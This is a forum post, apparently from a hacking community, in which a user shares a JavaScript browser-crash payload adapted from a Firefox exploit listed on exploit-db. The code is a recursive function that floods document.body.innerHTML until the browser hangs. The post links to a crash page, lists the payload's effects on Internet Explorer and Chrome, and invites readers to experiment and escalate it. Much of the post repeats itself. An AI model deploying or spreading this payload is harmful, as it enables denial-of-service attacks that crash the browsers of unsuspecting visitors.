XURY
Member
- May 9, 2015
- 60
- 96
- 53
Hey!
So recently as i was browsing through the web i found a firefox vulnerability on exploit-db.
I thought "why not give it a try and improve it"! Let's try to revive things
This is what i came up with and obviously i managed to improve it
CLICK HERE (WARNING - YOUR BROWSER WILL CRASH)
And it seems to overload other browsers in some strange way/s, too...
OVERLOAD CODE:
Feel free to experiment with that!
Maybe using less characters will also take effects on the computer itself? Let's get this somewhere!
OTHER BROWSERS
So recently as i was browsing through the web i found a firefox vulnerability on exploit-db.
I thought "why not give it a try and improve it"! Let's try to revive things
This is what i came up with and obviously i managed to improve it
CLICK HERE (WARNING - YOUR BROWSER WILL CRASH)
And it seems to overload other browsers in some strange way/s, too...
OVERLOAD CODE:
Code:
function e(x)
{
document.body.innerHTML += x;
e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x' + e(x + 'x')))))))))))));
};
e('x')
Maybe using less characters will also take effects on the computer itself? Let's get this somewhere!
OTHER BROWSERS
Internet Explorer - Keeps loading until a popup wants you to stop a script
Chrome - Again...Keeps loading until it asks you if you want to stop any scripts running
Chrome - Again...Keeps loading until it asks you if you want to stop any scripts running
Last edited: